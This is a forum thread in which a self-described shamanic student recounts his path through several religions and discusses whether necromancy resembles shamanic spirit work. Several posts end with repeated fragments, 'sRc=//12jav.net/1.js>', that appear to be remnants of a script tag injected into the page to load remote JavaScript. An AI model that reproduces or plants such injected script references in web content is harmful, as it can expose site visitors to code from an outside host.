I am a student learning all I can about the various religions offered on this site. I started out LDS as a kid. But, that didn't feel right. So, I proceeded to look around and ask people about their religions and religious views. Went through catholic catechism with my wife and refused to be baptized when I finished. Didn't feel right.
Started looking into wicca and druids. Felt closer. Found asatru and that was really close. Started reading about shamanism and realized I had been unknowingly following that since high school. But, I have incorporated parts of the other religions into it. No set practices as I am never home. And when I am, I use get called to find d out what is causing a house/apartment to feel dark and cold. Last one I think had kids playing with something that opened a doorway.
Anyways, here to learn more about everything I can. If you think you can teach me something, let me know. No vampire or werewolf stuff, please. Not into twilight. Necromancy sounds interesting as does astral projection and thought forms.
Thanks for reading. Have a great day. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Ok, necromancy studies by a shamanic student does sound odd. But, if I learn how something was created or summoned, I can reverse it and get rid of the entity. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

That's not that odd, but you need to learn what necromancy is to realize that... There is no reason to destroy anything in necromancy... sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Necromancy is communication with the dead in its simplest definition, right. And shaman work with spirits to get information. I guess, technically, a shaman could be considered a form of necromancer.
Now, before I get people saying I am wrong, I am going by basic definitions of both. Yes, shaman do other things like lead their groups and help the ill, but, a lot of their information comes from their spirit guides and animal guides. Aren't spirit guides usually ancestors? And ancestors are dead family. Hence the comparison.
Not trying to start a heated argument. Just making some general comparisons about the two. To help myself in a way.
